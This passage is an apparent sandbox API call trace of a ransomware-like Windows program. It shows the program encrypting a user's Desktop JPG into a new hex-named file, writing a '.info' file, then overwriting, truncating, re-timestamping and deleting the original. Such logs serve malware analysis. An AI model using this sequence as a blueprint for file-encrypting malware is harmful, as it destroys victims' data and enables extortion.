lpOldMode=0x1bf5d930) returned 1 [0069.642] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2485DB33939563D3B5B58AF28B3A08D8" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\2485db33939563d3b5b58af28b3a08d8"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x40c [0069.643] GetFileType (hFile=0x40c) returned 0x1 [0069.643] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d8a0) returned 1 [0069.643] GetFileType (hFile=0x40c) returned 0x1 [0069.644] ReadFile (in: hFile=0x3d4, lpBuffer=0x22ba1c0, nNumberOfBytesToRead=0x14000, lpNumberOfBytesRead=0x1bf5da28, lpOverlapped=0x0 | out: lpBuffer=0x22ba1c0*, lpNumberOfBytesRead=0x1bf5da28*=0x75fe, lpOverlapped=0x0) returned 1 [0069.645] CryptEncrypt (in: hKey=0x1a626b40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x22ce1d8*, pdwDataLen=0x1bf5da80*=0x75f0, dwBufLen=0x75f0 | out: pbData=0x22ce1d8*, pdwDataLen=0x1bf5da80*=0x75f0) returned 1 [0069.645] WriteFile (in: hFile=0x40c, lpBuffer=0x22ce1d8*, nNumberOfBytesToWrite=0x75f0, lpNumberOfBytesWritten=0x1bf5da18, lpOverlapped=0x0 | out: lpBuffer=0x22ce1d8*, lpNumberOfBytesWritten=0x1bf5da18*=0x75f0, lpOverlapped=0x0) returned 1 [0069.647] ReadFile (in: hFile=0x3d4, lpBuffer=0x22ba1c0, nNumberOfBytesToRead=0x14000, lpNumberOfBytesRead=0x1bf5da28, lpOverlapped=0x0 | out: lpBuffer=0x22ba1c0*, lpNumberOfBytesRead=0x1bf5da28*=0x0, lpOverlapped=0x0) returned 1 [0069.647] CryptEncrypt (in: hKey=0x1a626b40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x22d5808*, pdwDataLen=0x1bf5d9c0*=0x10, dwBufLen=0x10 | out: pbData=0x22d5808*, pdwDataLen=0x1bf5d9c0*=0x10) returned 1 [0069.647] CryptEncrypt (in: hKey=0x1a626b40, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x22d5858*, pdwDataLen=0x1bf5d9c0*=0x0, dwBufLen=0x10 | out: pbData=0x22d5858*, pdwDataLen=0x1bf5d9c0*=0x10) returned 1 [0069.647] WriteFile (in: hFile=0x40c, lpBuffer=0x22d58a8*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x1bf5d948, lpOverlapped=0x0 | out: lpBuffer=0x22d58a8*, lpNumberOfBytesWritten=0x1bf5d948*=0x10, lpOverlapped=0x0) returned 1 [0069.647] CloseHandle (hObject=0x40c) returned 1 [0069.648] CloseHandle (hObject=0x3d4) returned 1 [0069.648] CryptDestroyKey (hKey=0x1a6269f0) returned 1 [0069.648] CryptReleaseContext (hProv=0x1a5b7610, dwFlags=0x0) returned 1 [0069.648] CryptReleaseContext (hProv=0x1a5b7610, dwFlags=0x0) returned 1 [0069.648] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2485DB33939563D3B5B58AF28B3A08D8", nBufferLength=0x105, lpBuffer=0x1bf5d480, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2485DB33939563D3B5B58AF28B3A08D8", lpFilePart=0x0) returned 0x46 [0069.649] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d960) returned 1 [0069.649] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2485DB33939563D3B5B58AF28B3A08D8" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\2485db33939563d3b5b58af28b3a08d8"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x3d4 [0069.649] GetFileType (hFile=0x3d4) returned 0x1 [0069.649] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d8d0) returned 1 [0069.649] GetFileType (hFile=0x3d4) returned 0x1 [0069.649] ReadFile (in: hFile=0x3d4, lpBuffer=0x22d6f98, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x22d6f98*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0069.650] ReadFile (in: hFile=0x3d4, lpBuffer=0x22d6f98, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x22d6f98*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0069.651] ReadFile (in: hFile=0x3d4, lpBuffer=0x22d6f98, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x22d6f98*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0069.652] ReadFile (in: hFile=0x3d4, lpBuffer=0x22d6f98, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x22d6f98*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0069.653] ReadFile (in: hFile=0x3d4, lpBuffer=0x22d6f98, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x22d6f98*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0069.653] ReadFile (in: hFile=0x3d4, lpBuffer=0x22d6f98, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x22d6f98*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0069.654] ReadFile (in: hFile=0x3d4, lpBuffer=0x22d6f98, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x22d6f98*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0069.654] ReadFile (in: hFile=0x3d4, lpBuffer=0x22d6f98, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x22d6f98*, lpNumberOfBytesRead=0x1bf5da48*=0x600, lpOverlapped=0x0) returned 1 [0069.654] ReadFile (in: hFile=0x3d4, lpBuffer=0x22d6f98, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x22d6f98*, lpNumberOfBytesRead=0x1bf5da48*=0x0, lpOverlapped=0x0) returned 1 [0069.654] CloseHandle (hObject=0x3d4) returned 1 [0069.656] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2485DB33939563D3B5B58AF28B3A08D8.info", nBufferLength=0x105, lpBuffer=0x1bf5d200, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2485DB33939563D3B5B58AF28B3A08D8.info", lpFilePart=0x0) returned 0x4b [0069.656] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d6e0) returned 1 [0069.656] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2485DB33939563D3B5B58AF28B3A08D8.info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\2485db33939563d3b5b58af28b3a08d8.info"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x3d4 [0069.656] GetFileType (hFile=0x3d4) returned 0x1 [0069.656] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d650) returned 1 [0069.657] GetFileType (hFile=0x3d4) returned 0x1 [0069.657] WriteFile (in: hFile=0x3d4, lpBuffer=0x22e3660*, nNumberOfBytesToWrite=0x77d, lpNumberOfBytesWritten=0x1bf5d7b8, lpOverlapped=0x0 | out: lpBuffer=0x22e3660*, lpNumberOfBytesWritten=0x1bf5d7b8*=0x77d, lpOverlapped=0x0) returned 1 [0069.658] CloseHandle (hObject=0x3d4) returned 1 [0069.659] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\eviCleE.jpg", nBufferLength=0x105, lpBuffer=0x1bf5d630, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\eviCleE.jpg", lpFilePart=0x0) returned 0x31 [0069.659] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5da70) returned 1 [0069.659] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\eviCleE.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\eviclee.jpg"), fInfoLevelId=0x0, lpFileInformation=0x1bf5db50 | out: lpFileInformation=0x1bf5db50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x74e9e860, ftCreationTime.dwHighDateTime=0x1d4c99a, ftLastAccessTime.dwLowDateTime=0x85cc2d90, ftLastAccessTime.dwHighDateTime=0x1d4d27e, ftLastWriteTime.dwLowDateTime=0x85cc2d90, ftLastWriteTime.dwHighDateTime=0x1d4d27e, nFileSizeHigh=0x0, nFileSizeLow=0x75fe)) returned 1 [0069.659] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5da30) returned 1 [0069.659] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\eviCleE.jpg", nBufferLength=0x105, lpBuffer=0x1bf5d630, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\eviCleE.jpg", lpFilePart=0x0) returned 0x31 [0069.659] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\eviCleE.jpg", dwFileAttributes=0x80) returned 1 [0069.660] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\eviCleE.jpg", nBufferLength=0x105, lpBuffer=0x1bf5d630, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\eviCleE.jpg", lpFilePart=0x0) returned 0x31 [0069.660] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5dab0) returned 1 [0069.660] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\eviCleE.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\eviclee.jpg"), fInfoLevelId=0x0, lpFileInformation=0x22eb238 | out: lpFileInformation=0x22eb238*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x74e9e860, ftCreationTime.dwHighDateTime=0x1d4c99a, ftLastAccessTime.dwLowDateTime=0x85cc2d90, ftLastAccessTime.dwHighDateTime=0x1d4d27e, ftLastWriteTime.dwLowDateTime=0x85cc2d90, ftLastWriteTime.dwHighDateTime=0x1d4d27e, nFileSizeHigh=0x0, nFileSizeLow=0x75fe)) returned 1 [0069.660] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5da70) returned 1 [0069.660] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\eviCleE.jpg", nBufferLength=0x105, lpBuffer=0x1bf5d4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\eviCleE.jpg", lpFilePart=0x0) returned 0x31 [0069.660] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d9a0) returned 1 [0069.660] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\eviCleE.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\eviclee.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x3d4 [0069.660] GetFileType (hFile=0x3d4) returned 0x1 [0069.660] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d910) returned 1 [0069.660] GetFileType (hFile=0x3d4) returned 0x1 [0069.660] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db08*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5db08*=0) returned 0x0 [0069.661] WriteFile (in: hFile=0x3d4, lpBuffer=0x22eb6a0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x22eb6a0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0069.662] WriteFile (in: hFile=0x3d4, lpBuffer=0x22eb6a0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x22eb6a0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0069.663] WriteFile (in: hFile=0x3d4, lpBuffer=0x22eb6a0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x22eb6a0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0069.663] WriteFile (in: hFile=0x3d4, lpBuffer=0x22eb6a0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x22eb6a0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0069.664] WriteFile (in: hFile=0x3d4, lpBuffer=0x22eb6a0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x22eb6a0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0069.665] WriteFile (in: hFile=0x3d4, lpBuffer=0x22eb6a0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x22eb6a0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0069.666] WriteFile (in: hFile=0x3d4, lpBuffer=0x22eb6a0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x22eb6a0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0069.666] WriteFile (in: hFile=0x3d4, lpBuffer=0x22eb6a0*, nNumberOfBytesToWrite=0x600, lpNumberOfBytesWritten=0x1bf5daa8, lpOverlapped=0x0 | out: lpBuffer=0x22eb6a0*, lpNumberOfBytesWritten=0x1bf5daa8*=0x600, lpOverlapped=0x0) returned 1 [0069.666] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db08*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5db08*=0) returned 0x0 [0069.667] WriteFile (in: hFile=0x3d4, lpBuffer=0x22eb6a0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x22eb6a0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0069.667] WriteFile (in: hFile=0x3d4, lpBuffer=0x22eb6a0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x22eb6a0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0069.668] WriteFile (in: hFile=0x3d4, lpBuffer=0x22eb6a0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x22eb6a0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0069.734] WriteFile (in: hFile=0x3d4, lpBuffer=0x22eb6a0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x22eb6a0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0069.735] WriteFile (in: hFile=0x3d4, lpBuffer=0x22eb6a0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x22eb6a0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0069.735] WriteFile (in: hFile=0x3d4, lpBuffer=0x22eb6a0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x22eb6a0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0069.736] WriteFile (in: hFile=0x3d4, lpBuffer=0x22eb6a0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x22eb6a0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0069.736] WriteFile (in: hFile=0x3d4, lpBuffer=0x22eb6a0*, nNumberOfBytesToWrite=0x600, lpNumberOfBytesWritten=0x1bf5daa8, lpOverlapped=0x0 | out: lpBuffer=0x22eb6a0*, lpNumberOfBytesWritten=0x1bf5daa8*=0x600, lpOverlapped=0x0) returned 1 [0069.736] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db08*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5db08*=0) returned 0x0 [0069.737] WriteFile (in: hFile=0x3d4, lpBuffer=0x22eb6a0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x22eb6a0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0069.738] WriteFile (in: hFile=0x3d4, lpBuffer=0x22eb6a0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x22eb6a0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0069.739] WriteFile (in: hFile=0x3d4, lpBuffer=0x22eb6a0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x22eb6a0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0069.739] WriteFile (in: hFile=0x3d4, lpBuffer=0x22eb6a0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x22eb6a0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0069.740] WriteFile (in: hFile=0x3d4, lpBuffer=0x22eb6a0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x22eb6a0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0069.741] WriteFile (in: hFile=0x3d4, lpBuffer=0x22eb6a0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x22eb6a0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0069.742] WriteFile (in: hFile=0x3d4, lpBuffer=0x22eb6a0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x22eb6a0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0069.742] WriteFile (in: hFile=0x3d4, lpBuffer=0x22eb6a0*, nNumberOfBytesToWrite=0x600, lpNumberOfBytesWritten=0x1bf5daa8, lpOverlapped=0x0 | out: lpBuffer=0x22eb6a0*, lpNumberOfBytesWritten=0x1bf5daa8*=0x600, lpOverlapped=0x0) returned 1 [0069.742] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db08*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5db08*=0) returned 0x0 [0069.743] WriteFile (in: hFile=0x3d4, lpBuffer=0x22eb6a0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x22eb6a0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0069.743] WriteFile (in: hFile=0x3d4, lpBuffer=0x22eb6a0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x22eb6a0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0069.744] WriteFile (in: hFile=0x3d4, lpBuffer=0x22eb6a0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x22eb6a0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0069.745] WriteFile (in: hFile=0x3d4, lpBuffer=0x22eb6a0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x22eb6a0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0069.746] WriteFile (in: hFile=0x3d4, lpBuffer=0x22eb6a0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x22eb6a0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0069.746] WriteFile (in: hFile=0x3d4, lpBuffer=0x22eb6a0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x22eb6a0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0069.747] WriteFile (in: hFile=0x3d4, lpBuffer=0x22eb6a0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x22eb6a0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0069.748] WriteFile (in: hFile=0x3d4, lpBuffer=0x22eb6a0*, nNumberOfBytesToWrite=0x600, lpNumberOfBytesWritten=0x1bf5daa8, lpOverlapped=0x0 | out: lpBuffer=0x22eb6a0*, lpNumberOfBytesWritten=0x1bf5daa8*=0x600, lpOverlapped=0x0) returned 1 [0069.748] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db18*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5db18*=0) returned 0x0 [0069.748] SetEndOfFile (hFile=0x3d4) returned 1 [0069.749] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db18*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x1bf5db18*=0) returned 0x0 [0069.749] CloseHandle (hObject=0x3d4) returned 1 [0069.749] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\eviCleE.jpg", nBufferLength=0x105, lpBuffer=0x1bf5d430, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\eviCleE.jpg", lpFilePart=0x0) returned 0x31 [0069.750] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d910) returned 1 [0069.750] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\eviCleE.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\eviclee.jpg"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x3d4 [0069.750] GetFileType (hFile=0x3d4) returned 0x1 [0069.750] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d880) returned 1 [0069.750] GetFileType (hFile=0x3d4) returned 0x1 [0069.750] SetFileTime (hFile=0x3d4, lpCreationTime=0x1bf5db78, lpLastAccessTime=0x0, lpLastWriteTime=0x0) returned 1 [0069.750] CloseHandle (hObject=0x3d4) returned 1 [0069.750] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\eviCleE.jpg", nBufferLength=0x105, lpBuffer=0x1bf5d430, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\eviCleE.jpg", lpFilePart=0x0) returned 0x31 [0069.750] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d910) returned 1 [0069.750] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\eviCleE.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\eviclee.jpg"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x3d4 [0069.750] GetFileType (hFile=0x3d4) returned 0x1 [0069.750] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d880) returned 1 [0069.750] GetFileType (hFile=0x3d4) returned 0x1 [0069.750] SetFileTime (hFile=0x3d4, lpCreationTime=0x0, lpLastAccessTime=0x1bf5db78, lpLastWriteTime=0x0) returned 1 [0069.750] CloseHandle (hObject=0x3d4) returned 1 [0069.751] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\eviCleE.jpg", nBufferLength=0x105, lpBuffer=0x1bf5d430, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\eviCleE.jpg", lpFilePart=0x0) returned 0x31 [0069.751] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d910) returned 1 [0069.751] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\eviCleE.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\eviclee.jpg"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x3d4 [0069.751] GetFileType (hFile=0x3d4) returned 0x1 [0069.751] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d880) returned 1 [0069.751] GetFileType (hFile=0x3d4) returned 0x1 [0069.751] SetFileTime (hFile=0x3d4, lpCreationTime=0x0, lpLastAccessTime=0x0, lpLastWriteTime=0x1bf5db78) returned 1 [0069.751] CloseHandle (hObject=0x3d4) returned 1 [0069.751] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\eviCleE.jpg", nBufferLength=0x105, lpBuffer=0x1bf5d630, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\eviCleE.jpg", lpFilePart=0x0) returned 0x31 [0069.751] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\eviCleE.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\eviclee.jpg")) returned 1 [0069.752] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\eviCleE.jpg", nBufferLength=0x105, lpBuffer=0x1bf5d700, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\eviCleE.jpg", lpFilePart=0x0) returned 0x31 [0069.753] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2485DB33939563D3B5B58AF28B3A08D8", nBufferLength=0x105, lpBuffer=0x1bf5d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS 